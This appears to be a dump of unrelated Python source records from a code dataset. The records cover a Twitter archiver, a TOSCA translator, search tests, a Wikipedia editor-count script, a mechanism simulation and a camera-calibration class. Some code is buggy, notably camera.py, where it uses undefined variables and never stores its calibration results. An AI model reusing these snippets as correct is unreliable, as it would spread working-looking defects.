except ConnectionError as e:\n logging.warn(\"caught connection error: %s\", e)\n self.connect()\n return f(self, *args, **kwargs)\n return new_f\n\n\ndef catch_timeout(f):\n \"\"\"\n A decorator to handle read timeouts from Twitter.\n \"\"\"\n def new_f(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except requests.exceptions.ReadTimeout as e:\n logging.warn(\"caught read timeout: %s\", e)\n self.connect()\n return f(self, *args, **kwargs)\n return new_f\n\ndef catch_gzip_errors(f):\n \"\"\"\n A decorator to handle gzip encoding errors which have been known to\n happen during hydration.\n \"\"\"\n def new_f(self, *args, **kwargs):\n try:\n return f(self, *args, **kwargs)\n except requests.exceptions.ContentDecodingError as e:\n logging.warn(\"caught gzip error: %s\", e)\n self.connect()\n return f(self, *args, **kwargs)\n return new_f\n\n\n\nclass Twarc(object):\n \"\"\"\n Your friendly neighborhood Twitter archiving class. Twarc allows\n you to search for existing tweets, stream live tweets that match\n a filter query and lookup (hdyrate) a list of tweet ids.\n\n Each method search, stream and hydrate returns a tweet iterator which\n allows you to do what you want with the data. Twarc handles rate limiting\n in the API, so it will go to sleep when Twitter tells it to, and wake back\n up when it is able to get more data from the API.\n \"\"\"\n\n def __init__(self, consumer_key, consumer_secret, access_token,\n access_token_secret):\n \"\"\"\n Instantiate a Twarc instance. Make sure your environment variables\n are set.\n \"\"\"\n\n self.consumer_key = consumer_key\n self.consumer_secret = consumer_secret\n self.access_token = access_token\n self.access_token_secret = access_token_secret\n self.client = None\n self.last_response = None\n self.connect()\n\n def search(self, q, max_id=None, since_id=None, lang=None,\n result_type='recent'):\n \"\"\"\n Pass in a query with optional max_id, min_id or lang and get\n back an iterator for decoded tweets. Defaults to recent (i.e.\n not mixed, the API default, or popular) tweets.\n \"\"\"\n logging.info(\"starting search for %s\", q)\n url = \"https://api.twitter.com/1.1/search/tweets.json\"\n params = {\n \"count\": 100,\n \"q\": q\n }\n if lang is not None:\n params['lang'] = lang\n if result_type in ['mixed', 'recent', 'popular']:\n params['result_type'] = result_type\n else:\n params['result_type'] = 'recent'\n\n while True:\n if since_id:\n params['since_id'] = since_id\n if max_id:\n params['max_id'] = max_id\n\n resp = self.get(url, params=params)\n statuses = resp.json()[\"statuses\"]\n\n if len(statuses) == 0:\n logging.info(\"no new tweets matching %s\", params)\n break\n\n for status in statuses:\n yield status\n\n max_id = str(int(status[\"id_str\"]) - 1)\n\n def timeline(self, user_id=None, screen_name=None, max_id=None,\n since_id=None):\n \"\"\"\n Returns a collection of the most recent tweets posted\n by the user indicated by the user_id or screen_name parameter.\n Provide a user_id or screen_name.\n \"\"\"\n # Strip if screen_name is prefixed with '@'\n if screen_name:\n screen_name = screen_name.lstrip('@')\n id = screen_name or user_id\n id_type = \"screen_name\" if screen_name else \"user_id\"\n logging.info(\"starting user timeline for user %s\", id)\n url = \"https://api.twitter.com/1.1/statuses/user_timeline.json\"\n params = {\"count\": 200, id_type: id}\n\n while True:\n if since_id:\n params['since_id'] = since_id\n if max_id:\n params['max_id'] = max_id\n\n try:\n resp = self.get(url, params=params, allow_404=True)\n except requests.exceptions.HTTPError as e:\n if e.response.status_code == 404:\n logging.info(\"no timeline available for %s\", id)\n break\n raise e\n\n statuses = resp.json()\n\n if len(statuses) == 0:\n logging.info(\"no new tweets matching %s\", params)\n break\n\n for status in statuses:\n # If you request an invalid user_id, you may still get\n # results so need to check.\n if not user_id or user_id == status.get(\"user\",\n {}).get(\"id_str\"):\n yield status\n\n max_id = str(int(status[\"id_str\"]) - 1)\n\n def user_lookup(self, screen_names=None, user_ids=None):\n \"\"\"\n Returns fully-hydrated user objects for a list of up to 100\n screen_names or user_ids. Provide screen_names or user_ids.\n \"\"\"\n # Strip if any screen names are prefixed with '@'\n if screen_names:\n screen_names = [s.lstrip('@') for s in screen_names]\n ids = screen_names or user_ids\n id_type = \"screen_name\" if screen_names else \"user_id\"\n while ids:\n ids_str = \",\".join(ids[:100])\n logging.info(\"Looking up users %s\", ids_str)\n url = 'https://api.twitter.com/1.1/users/lookup.json'\n params = {id_type: ids_str}\n try:\n resp = self.get(url, params=params, allow_404=True)\n except requests.exceptions.HTTPError as e:\n if e.response.status_code == 404:\n logging.info(\"no users matching %s\", ids_str)\n break\n raise e\n\n users = resp.json()\n for user in users:\n yield user\n\n ids = ids[100:]\n\n def filter(self, track=None, follow=None, locations=None):\n \"\"\"\n Returns an iterator for tweets that match a given filter track from\n the livestream of tweets happening right now.\n \"\"\"\n if locations is not None:\n if type(locations) == list:\n locations = ','.join(locations)\n locations = locations.replace('\\\\', '')\n\n url = 'https://stream.twitter.com/1.1/statuses/filter.json'\n params = {\"stall_warning\": True}\n if track:\n params[\"track\"] = track\n if follow:\n params[\"follow\"] = follow\n if locations:\n params[\"locations\"] = locations\n headers = {'accept-encoding': 'deflate, gzip'}\n errors = 0\n while True:\n try:\n logging.info(\"connecting to filter stream for %s\", params)\n resp = self.post(url, params, headers=headers, stream=True)\n errors = 0\n for line in resp.iter_lines(chunk_size=512):\n if not line:\n logging.info(\"keep-alive\")\n continue\n try:\n yield json.loads(line.decode())\n except Exception as e:\n logging.error(\"json parse error: %s - %s\", e, line)\n except requests.exceptions.HTTPError as e:\n errors += 1\n logging.error(e)\n if e.response.status_code == 420:\n t = errors * 60\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n else:\n t = errors * 5\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n except Exception as e:\n errors += 1\n t = errors * 1\n logging.error(e)\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n\n def sample(self):\n \"\"\"\n Returns a small random sample of all public statuses. The Tweets\n returned by the default access level are the same, so if two different\n clients connect to this endpoint, they will see the same Tweets.\n \"\"\"\n url = 'https://stream.twitter.com/1.1/statuses/sample.json'\n params = {\"stall_warning\": True}\n headers = {'accept-encoding': 'deflate, gzip'}\n errors = 0\n while True:\n try:\n logging.info(\"connecting to sample stream\")\n resp = self.post(url, params, headers=headers, stream=True)\n errors = 0\n for line in resp.iter_lines(chunk_size=512):\n if line == \"\":\n logging.info(\"keep-alive\")\n continue\n try:\n yield json.loads(line.decode())\n except Exception as e:\n logging.error(\"json parse error: %s - %s\", e, line)\n except requests.exceptions.HTTPError as e:\n errors += 1\n logging.error(e)\n if e.response.status_code == 420:\n t = errors * 60\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n else:\n t = errors * 5\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n except Exception as e:\n errors += 1\n t = errors * 1\n logging.error(e)\n logging.info(\"sleeping %s\", t)\n time.sleep(t)\n\n def hydrate(self, iterator):\n \"\"\"\n Pass in an iterator of tweet ids and get back an iterator for the\n decoded JSON for each corresponding tweet.\n \"\"\"\n ids = []\n url = \"https://api.twitter.com/1.1/statuses/lookup.json\"\n\n # lookup 100 tweets at a time\n for tweet_id in iterator:\n tweet_id = tweet_id.strip() # remove new line if present\n ids.append(tweet_id)\n if len(ids) == 100:\n logging.info(\"hydrating %s ids\", len(ids))\n resp = self.post(url, data={\"id\": ','.join(ids)})\n tweets = resp.json()\n tweets.sort(key=lambda t: t['id_str'])\n for tweet in tweets:\n yield tweet\n ids = []\n\n # hydrate any remaining ones\n if len(ids) > 0:\n logging.info(\"hydrating %s\", ids)\n resp = self.client.post(url, data={\"id\": ','.join(ids)})\n for tweet in resp.json():\n yield tweet\n\n @rate_limit\n @catch_conn_reset\n @catch_timeout\n @catch_gzip_errors\n def get(self, *args, **kwargs):\n # Pass allow 404 to not retry on 404\n allow_404 = kwargs.pop('allow_404', False)\n try:\n r = self.last_response = self.client.get(*args, **kwargs)\n # this has been noticed, believe it or not\n # https://github.com/edsu/twarc/issues/75\n if r.status_code == 404 and not allow_404:\n logging.warn(\"404 from Twitter API! trying again\")\n time.sleep(1)\n r = self.get(*args, **kwargs)\n return r\n except requests.exceptions.ConnectionError as e:\n logging.error(\"caught connection error %s\", e)\n self.connect()\n return self.get(*args, **kwargs)\n\n @rate_limit\n @catch_conn_reset\n @catch_timeout\n @catch_gzip_errors\n def post(self, *args, **kwargs):\n try:\n self.last_response = self.client.post(*args, **kwargs)\n return self.last_response\n except requests.exceptions.ConnectionError as e:\n logging.error(\"caught connection error %s\", e)\n self.connect()\n return self.post(*args, **kwargs)\n\n def connect(self):\n \"\"\"\n Sets up the HTTP session to talk to Twitter. If one is active it is\n closed and another one is opened.\n \"\"\"\n if self.client:\n logging.info(\"closing existing http session\")\n self.client.close()\n if self.last_response:\n logging.info(\"closing last response\")\n self.last_response.close()\n logging.info(\"creating http session\")\n self.client = OAuth1Session(\n client_key=self.consumer_key,\n client_secret=self.consumer_secret,\n resource_owner_key=self.access_token,\n resource_owner_secret=self.access_token_secret\n )\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"twarc.py","file_name":"twarc.py","file_ext":"py","file_size_in_byte":24293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"167197898","text":"# Copyright 2016 RIFT.io Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport argparse\nimport logging\nimport logging.config\nimport os\nimport shutil\nimport tarfile\nimport tempfile\nimport zipfile\n\nimport rift.mano.tosca_translator.shell as shell\n\n\nclass ToscaPackage(object):\n\n SUPPORTED_INPUTS = (YAML, ZIP) = ('yaml', 'zip')\n FILE_EXTS = (ZIP, TARGZ) = ('.zip', '.tar.gz')\n\n def __init__(self, log, in_file, out_file=None):\n self.log = log\n self.in_file = os.path.abspath(os.path.normpath(in_file))\n if out_file:\n self.out_file = os.path.abspath(os.path.normpath(out_file))\n if zipfile.is_zipfile(in_file):\n if in_file.endswith(self.TARGZ):\n if out_file is None:\n self.out_file = self.in_file\n # Currently we store all the files uploaded\n # in lauchpad as tar.gz\n self.in_file = self.in_file.replace(self.TARGZ, self.ZIP)\n shutil.move(self.out_file, self.in_file)\n elif in_file.endswith(self.ZIP):\n if out_file is None:\n self.out_file = self.in_file.replace(self.ZIP, self.TARGZ)\n self.log.debug(\"Tosca file: {}, Output file: {}\".\n format(self.in_file, self.out_file))\n else:\n err_msg = \"{} is not a zip file.\".format(in_file)\n self.log.error(err_msg)\n raise ValueError(err_msg)\n\n def translate(self):\n try:\n out_file = None\n prevdir = os.getcwd()\n # Create a temp directory to generate the yang descriptors\n with tempfile.TemporaryDirectory() as tmpdirname:\n output_dir = tmpdirname+'/yang'\n tmpl_file = '--template-file='+self.in_file\n out_dir = '--output-dir='+output_dir\n trans_args = [tmpl_file, out_dir]\n self.log.debug(\"Calling tosca-translator with args:{}\".\n format(trans_args))\n shell.main(args=trans_args, log=self.log)\n\n # Get the list of translated files\n os.chdir(output_dir)\n flist = []\n for root, dirs, files in os.walk(output_dir):\n rel_dir = (root.replace(output_dir, '')).lstrip('/')\n for f in files:\n flist.append(os.path.join(rel_dir, f))\n self.log.debug(\"File list to archive: {}\".format(flist))\n\n # Generate a tar file with the output files\n with tarfile.open(self.out_file, 'w:gz') as tar:\n for f in flist:\n tar.add(f)\n out_file = self.out_file\n self.log.debug(\"Output file: {}\".format(out_file))\n except Exception as e:\n self.log.error(\"Error processing TOSCA file {}: {}\".\n format(self.in_file, e))\n self.log.exception(e)\n finally:\n os.chdir(prevdir)\n\n return out_file\n\n @staticmethod\n def is_tosca_package(in_file):\n if zipfile.is_zipfile(in_file):\n return True\n else:\n return False\n\n\ndef main(raw_args=None, log=None):\n parser = argparse.ArgumentParser(\n description='RIFT TOSCA translator for descriptors')\n parser.add_argument(\n \"-f\",\n \"--csar-file\",\n required=True,\n help=\"TOSCA CSAR file to translate\")\n parser.add_argument(\n \"-o\",\n \"--output-file\",\n help=\"Output filename\")\n parser.add_argument(\n \"--debug\",\n help=\"Enable debug logging\",\n action=\"store_true\")\n if raw_args:\n args = parser.parse_args(raw_args)\n else:\n args = parser.parse_args()\n\n if log is None:\n if args.debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.ERROR)\n log = logging.getLogger(\"tosca-translator\")\n\n return ToscaPackage(log, args.csar_file,\n out_file=args.output_file).translate()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modules/core/mano/rwlaunchpad/plugins/rwlaunchpadtasklet/rift/tasklets/rwlaunchpad/tosca.py","file_name":"tosca.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"59802554","text":"import warnings\n\nfrom pyaxmlparser import APK\n\n\nfile = '/home/chillar/projects/android/apps/adbd-Insecure-v2.00.apk'\n\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n apk = APK(file)\n print(apk.package)\n","sub_path":"python/pyaxmlparser_exp.py","file_name":"pyaxmlparser_exp.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"107616364","text":"\"\"\"\ntest_search.py - tests for the search module\nauthor: mutantmonkey \n\"\"\"\nimport re\nimport unittest\nfrom mock import MagicMock\nfrom modules.search import google_search, gsearch, my_api_key, my_cse_id, \\\n bing_search, bing, duck_search, duck, search, suggest\nfrom tools import is_up\nfrom web import unquote\n\n\n# tests involving Google searches are expected to fail because Google's Web\n# Search API was officially deprecated in Nov. 2010 and discontinued in Sep.\n# 2014; the eventual fix should use https://cse.google.com/cse/ and this hack:\n# http://stackoverflow.com/a/11206266/1846915\n#\n# update as of 2017-01-14: this has been fixed\nclass TestSearch(unittest.TestCase):\n def setUp(self):\n self.skip_msg = '{:s} is down, skipping test.'\n self.engines = {\n 'Google': 'https://google.com',\n 'Bing': 'https://bing.com',\n 'DuckDuckGo': 'https://duckduckgo.com',\n 'Suggestion script': 'http://websitedev.de'\n }\n self.phenny = MagicMock()\n self.input = MagicMock()\n\n def test_google_search(self):\n if not is_up(self.engines['Google']):\n self.skipTest(self.skip_msg.format('Google'))\n self.input.group.return_value = 'vtluug virginia phenny'\n results = google_search(self.input, my_api_key, my_cse_id)\n self.assertTrue(results)\n\n def test_gsearch(self):\n if not is_up(self.engines['Google']):\n self.skipTest(self.skip_msg.format('Google'))\n self.input.group.return_value = 'vtluug virginia phenny'\n gsearch(self.phenny, self.input)\n self.assertTrue(self.phenny.say.called)\n\n def test_bing_search(self):\n if not is_up(self.engines['Bing']):\n self.skipTest(self.skip_msg.format('Bing'))\n out = bing_search('phenny')\n m = re.match('^https?://.*$', out, flags=re.UNICODE)\n self.assertTrue(m)\n\n def test_bing(self):\n if not is_up(self.engines['Bing']):\n self.skipTest(self.skip_msg.format('Bing'))\n self.input.group.return_value = 'swhack'\n bing(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called)\n\n def test_duck_search(self):\n if not is_up(self.engines['DuckDuckGo']):\n self.skipTest(self.skip_msg.format('DuckDuckGo'))\n out = unquote(duck_search('phenny'))\n m = re.match(r'^https?://.*$', out, flags=re.UNICODE)\n self.assertTrue(m)\n\n def test_duck(self):\n if not is_up(self.engines['DuckDuckGo']):\n self.skipTest(self.skip_msg.format('DuckDuckGo'))\n self.input.group.return_value = 'swhack'\n duck(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called)\n\n def test_search(self):\n if not (self.engines['DuckDuckGo'] or self.engines['Bing'] or self.engines['Google']):\n self.skipTest('All search engines are down, skipping test.')\n self.input.group.return_value = 'vtluug'\n duck(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called)\n\n def test_suggest(self):\n if not is_up(self.engines['Suggestion script']):\n self.skipTest(self.skip_msg.format('Suggestion script'))\n self.input.group.return_value = 'vtluug'\n suggest(self.phenny, self.input)\n self.assertTrue(self.phenny.reply.called or self.phenny.say.called)\n","sub_path":"modules/test/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"296665538","text":"import json \nimport csv\n \n# Opening JSON file \nde = 0\nothers = 0\nde_list =[\"Germany\"]\nothers_list = [\"Others\"]\n\nfile_= open('data.csv', 'w')\n\nwith file_:\n writer = csv.writer(file_)\n\n for i in range(1,13):\n filename = str(i) + \".json\"\n print(filename)\n f = open(filename,) \n\n # returns JSON object as \n # a dictionary \n data = json.load(f) \n \n # Iterating through the json \n # list \n temp = 0\n for item in data['items']: \n for countries in item['countries']:\n if(countries['country']==\"DE\"):\n de_list.append(countries['editors-ceil'])\n de = de + countries['editors-ceil']\n else:\n temp = temp + countries['editors-ceil']\n others = others + countries['editors-ceil']\n \n others_list.append(temp)\n\n # print(de)\n # print(others)\n # Closing file \n\n f.close() \n\n de_list.append(de)\n others_list.append(others)\n \n writer.writerow([\"Country\",\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\",\"TOTAL\"])\n\n writer.writerow(de_list)\n writer.writerow(others_list)\n file_.close","sub_path":"editors data 2020/editors_by_country/de.wikipedia/editors with 5 - 99 edits/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"65760866","text":"from scipy import *\n\ndef init_squeezer():\n\t\"\"\" \n\tThe positions y_1 (q vector)\n\tThe constraint lambda ??\n\ty hstack stack horizontally, first position, derivatives, lambdas\n\typ the derivatives of angles/postions\n\t\"\"\"\n\ty_1 = array([-0.0617138900142764496358948458001, # beta\n\t\t\t\t0., # theta\n\t\t\t\t0.455279819163070380255912382449, # gamma\n\t\t\t\t0.222668390165885884674473185609, # phi\n\t\t\t\t0.487364979543842550225598953530, # delta\n\t\t\t\t-0.222668390165885884674473185609, # Omega\n\t\t\t\t1.23054744454982119249735015568]) #epsilon\n\tlamb = array([\n\t\t\t98.5668703962410896057654982170, # lambda[0]\n\t\t\t-6.12268834425566265503114393122]) # lambda[1]\t\t\t\n\ty=hstack((y_1,zeros((7,)),lamb,zeros((4,))))\n\typ=hstack((zeros(7,),array([\n\t\t\t14222.4439199541138705911625887, # betadotdot\n\t\t\t-10666.8329399655854029433719415, # Thetadotdot\n\t\t\t0.,0.,0.,0.,0.]),zeros((6,))))\n\treturn y,yp\n\ndef squeezer (t, y, yp, index):\n\t\"\"\"\n\tResidual function of the 7-bar mechanism in\n\tHairer, Vol. II, p. 533 ff, see also formula (7.11)\n\twritten in residual form\n\ty,yp vector of dim 20, t scalar\n\t\"\"\"\n\t# Inertia data\n\tm1,m2,m3,m4,m5,m6,m7=.04325,.00365,.02373,.00706,.07050,.00706,.05498\n\ti1,i2,i3,i4,i5,i6,i7=2.194e-6,4.410e-7,5.255e-6,5.667e-7,1.169e-5,5.667e-7,1.912e-5\n\t# Geometry\n\txa,ya=-.06934,-.00227\n\txb,yb=-0.03635,.03273\n\txc,yc=.014,.072\n\td,da,e,ea=28.e-3,115.e-4,2.e-2,1421.e-5\n\trr,ra=7.e-3,92.e-5\n\tss,sa,sb,sc,sd=35.e-3,1874.e-5,1043.e-5,18.e-3,2.e-2\n\tta,tb=2308.e-5,916.e-5\n\tu,ua,ub=4.e-2,1228.e-5,449.e-5\n\tzf,zt=2.e-2,4.e-2\n\tfa=1421.e-5\n\t# Driving torque\n\tmom=0.033\n\t# Spring data\n\tc0=4530.\n\tlo=0.07785\n\n\t# Initial computations and assignments\n\tbeta,theta,gamma,phi,delta,omega,epsilon=y[0:7]\n\tif index != 0:\n\t\tbep,thp,gap,php,dep,omp,epp=y[7:14]\n\t\tlamb=y[14:20]\n\tsibe,sith,siga,siph,side,siom,siep=sin(y[0:7])\n\tcobe,coth,coga,coph,code,coom,coep=cos(y[0:7])\n\t\n\t# Start calculating\n\tsibeth = sin(beta+theta);cobeth = cos(beta+theta)\n\tsiphde = sin(phi+delta);cophde = cos(phi+delta)\n\tsiomep = sin(omega+epsilon);coomep = cos(omega+epsilon)\n\n\n\t# Mass matrix\n\tm=zeros((7,7))\n\tm[0,0] = m1*ra**2 + m2*(rr**2-2*da*rr*coth+da**2) + i1 + i2\n\tm[1,0] = m[0,1] = m2*(da**2-da*rr*coth) + i2\n\tm[1,1] = m2*da**2 + i2\n\tm[2,2] = m3*(sa**2+sb**2) + i3\n\tm[3,3] = m4*(e-ea)**2 + i4\n\tm[4,3] = m[3,4] = m4*((e-ea)**2+zt*(e-ea)*siph) + i4\n\tm[4,4] = m4*(zt**2+2*zt*(e-ea)*siph+(e-ea)**2) + m5*(ta**2+tb**2)+ i4 + i5\n\tm[5,5] = m6*(zf-fa)**2 + i6\n\tm[6,5] = m[5,6] = m6*((zf-fa)**2-u*(zf-fa)*siom) + i6\n\tm[6,6] = m6*((zf-fa)**2-2*u*(zf-fa)*siom+u**2) + m7*(ua**2+ub**2)+ i6 + i7\n\n\t# Applied forces\n\n\txd = sd*coga + sc*siga + xb\n\tyd = sd*siga - sc*coga + yb\n\tlang = sqrt ((xd-xc)**2 + (yd-yc)**2)\n\tforce = - c0 * (lang - lo)/lang\n\tfx = force * (xd-xc)\n\tfy = force * (yd-yc)\n\tif index != 0:\n\t\tff=array([\n\t\t\tmom - m2*da*rr*thp*(thp+2*bep)*sith,\t\n\t\t\tm2*da*rr*bep**2*sith,\n\t\t\tfx*(sc*coga - sd*siga) + fy*(sd*coga + sc*siga),\n\t\t\tm4*zt*(e-ea)*dep**2*coph,\n\t\t\t- m4*zt*(e-ea)*php*(php+2*dep)*coph,\n\t\t\t- m6*u*(zf-fa)*epp**2*coom,\n\t\t\tm6*u*(zf-fa)*omp*(omp+2*epp)*coom])\n\n\t# constraint matrix G\n\n\tgp=zeros((6,7))\n\t\n\tgp[0,0] = - rr*sibe + d*sibeth\n\tgp[0,1] = d*sibeth\n\tgp[0,2] = - ss*coga\n\tgp[1,0] = rr*cobe - d*cobeth\n\tgp[1,1] = - d*cobeth\n\tgp[1,2] = - ss*siga\n\tgp[2,0] = - rr*sibe + d*sibeth\n\tgp[2,1] = d*sibeth\n\tgp[2,3] = - e*cophde\n\tgp[2,4] = - e*cophde + zt*side\n\tgp[3,0] = rr*cobe - d*cobeth\n\tgp[3,1] = - d*cobeth\n\tgp[3,3] = - e*siphde\n\tgp[3,4] = - e*siphde - zt*code\n\tgp[4,0] = - rr*sibe + d*sibeth\n\tgp[4,1] = d*sibeth\n\tgp[4,5] = zf*siomep\n\tgp[4,6] = zf*siomep - u*coep\n\tgp[5,0] = rr*cobe - d*cobeth\n\tgp[5,1] = - d*cobeth\n\tgp[5,5] = - zf*coomep\n\tgp[5,6] = - zf*coomep - u*siep\n\n\t# Index-3 constraint\n\tg=zeros((6,))\n\tg[0] = rr*cobe - d*cobeth - ss*siga - xb\n\tg[1] = rr*sibe - d*sibeth + ss*coga - yb\n\tg[2] = rr*cobe - d*cobeth - e*siphde - zt*code - xa\n\tg[3] = rr*sibe - d*sibeth + e*cophde - zt*side - ya\n\tg[4] = rr*cobe - d*cobeth - zf*coomep - u*siep - xa\n\tg[5] = rr*sibe - d*sibeth - zf*siomep + u*coep - ya\n\n\t# Construction of the residual\n\tif index == 3:\n\t\tres_1 = yp[0:7] - y[7:14]\n\t\tres_2 = dot(m,yp[7:14]) - ff[0:7]+dot(gp.T,lamb)\n\t\tres_3 = g\n\n\telif index == 2:\n\t\tres_1 = yp[0:7] - y[7:14]\n\t\tres_2 = dot(m,yp[7:14]) - ff[0:7]+dot(gp.T,lamb)\n\t\tw = y[7:14]\n\t\tres_3 = dot(gp,w)\n\n\telif index == 1:\n\t\tgpp=zeros((6,))\n\t\tw = y[7:14]\n\t\tgpp[0]=-rr*cobe*w[0]**2 + d*cobeth*(w[0]+w[1])**2 + ss*siga*w[2]**2\n\t\tgpp[1]=-rr*sibe*w[0]**2 + d*sibeth*(w[0]+w[1])**2 - ss*coga*w[2]**2\n\t\tgpp[2]=-rr*cobe*w[0]**2 + d*cobeth*(w[0]+w[1])**2 + e*siphde*(w[3]+w[4])**2 + zt*code*w[4]**2\n\t\tgpp[3]=-rr*sibe*w[0]**2 + d*sibeth*(w[0]+w[1])**2 - e*cophde*(w[3]+w[4])**2 + zt*side*w[4]**2 \n\t\tgpp[4]=-rr*cobe*w[0]**2 + d*cobeth*(w[0]+w[1])**2 + zf*coomep*(w[5]+w[6])**2 + u*siep*w[6]**2\n\t\tgpp[5]=-rr*sibe*w[0]**2 + d*sibeth*(w[0]+w[1])**2 + zf*siomep*(w[5]+w[6])**2 - u*coep*w[6]**2\n\n\t\treturn y, m, ff, gp, gpp\n\n\telse:\n\t\t# This function is used solely to get the g function for finding initial values\n\t\treturn g\n\n\treturn hstack((res_1,res_2,res_3))\n\n\t","sub_path":"squeezer_HsnppkU.py","file_name":"squeezer_HsnppkU.py","file_ext":"py","file_size_in_byte":5051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"321725416","text":"import cv2\nimport glob\nimport numpy as np\nimport pickle\n\nclass Camera():\n \n def __init__(self, filename='camera_cal/calibration1.jpg', nx=9, ny=6):\n self.objpoints = []\n self.imgpoints = []\n self.nx = nx\n self.ny = ny\n self.mtx = None\n self.dist = None\n self.M = None\n self.Minv = None\n \n # Load calibration settings.\n self._calibrate(filename)\n\n def _calibrate(self, filename):\n \"\"\" Calibrate the camera.\"\"\"\n img = cv2.imread(filename)\n self._get_distortion(img)\n \n \n def _calibrate_camera(self, filepath='camera_cal/calibration*.jpg'):\n \"\"\" Camera Calibration.\"\"\"\n\n # Load calibration images.\n images = glob.glob(filepath)\n objp = np.zeros((nx*ny,3), np.float32)\n objp[:,:2] = np.mgrid[0:self.nx, 0:self.ny].T.reshape(-1,2)\n\n # Pass through all images.\n for idx, fname in enumerate(images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, corners = cv2.findChessboardCorners(gray, (nx,ny), None)\n if ret == True: \n self.objpoints.append(objp)\n self.imgpoints.append(corners)\n\n def _get_distortion(self, img, filename='camera_cal/wide_dist_pickle.p'):\n \"\"\" Saves distortion matrix.\"\"\"\n try:\n dist_pickle = pickle.load(open(filename, \"rb\"))\n self.mtx = dist_pickle[\"mtx\"]\n self.dist = dist_pickle[\"dist\"]\n except:\n self.objpoints, self.imgpoints = self._calibrate_camera()\n img_size = (img.shape[1], img.shape[0])\n ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(self.objpoints, self.imgpoints, img_size, None, None)\n dst = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n\n # Save the camera calibration result for later use.\n dist_pickle = {}\n dist_pickle[\"mtx\"] = self.mtx\n dist_pickle[\"dist\"] = self.dist\n pickle.dump( dist_pickle, open( filename, \"wb\" ) )\n\n def warp_image(self, img):\n \"\"\"Warp Image\n \n Returns:\n Image, top-down view of original image.\n \"\"\"\n # Undistort the image.\n undist = cv2.undistort(img, self.mtx, self.dist, None, self.mtx)\n\n # Define lane region with lines.\n corners = [[580, 455],[695, 455],[1060, 690],[250, 690]]\n\n # Define src and dst regions.\n src = np.float32([corners[0], corners[1], corners[2], corners[3]])\n offset = [200, 30]\n img_size = (img.shape[1], img.shape[0])\n dst = np.float32([[offset[0], offset[1]], \n [img_size[0]-offset[0], offset[1]], \n [img_size[0]-offset[0], img_size[1]-offset[1]], \n [offset[0], img_size[1]-offset[1]]])\n self.M = cv2.getPerspectiveTransform(src, dst)\n self.Minv = cv2.getPerspectiveTransform(dst, src)\n\n return cv2.warpPerspective(undist, self.M, img_size)\n \n def unwarp_image(self, img):\n \"\"\" Unwarp Image to Original\n Returns:\n Image, unwarped image of original.\n \"\"\"\n img_size = (img.shape[1], img.shape[0])\n return cv2.warpPerspective(img, self.Minv, img_size, flags=cv2.INTER_LINEAR)","sub_path":"main/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"253529637","text":"from clients.models import ClientProfile, ProfileImage\nfrom models import Website\n\ndef website_from_profile(profile, cluster):\n\twebsite = Website(\n\t\taccount_key = profile.account_key, \n\t\treturn_url = profile.return_url, \n\t\twebsite_name = profile.website_name,\n\t\twebsite_url = profile.website,\n\t\tcluster = cluster\n\t\t)\n\twebsite.save()\n\treturn website\n\ndef clean_website_url(website_url):\n\tclean = website_url\n\tif clean.startswith('https://'):\n\t\tclean = website_url[len('https://'):]\n\telif clean.startswith('http://'):\n\t\tclean = website_url[len('http://'):]\n\tif clean.endswith('/'):\n\t\tclean = clean[0:len(clean)-1]\n\treturn clean\n\ndef profile_for_cluster(cluster):\n\tprofile = ClientProfile.objects.get(user = cluster.creator)\n\treturn profile\n\ndef profile_image_for_profile(profile):\n\tprofile_image = ProfileImage.objects.get(profile = profile)\n\treturn profile_image\n\ndef profile_image_for_cluster(cluster):\n\tprofile = profile_for_cluster(cluster)\n\treturn profile_image_for_profile(profile)","sub_path":"website_clusters/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11443457","text":"# Copyright 2021, Google LLC.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or 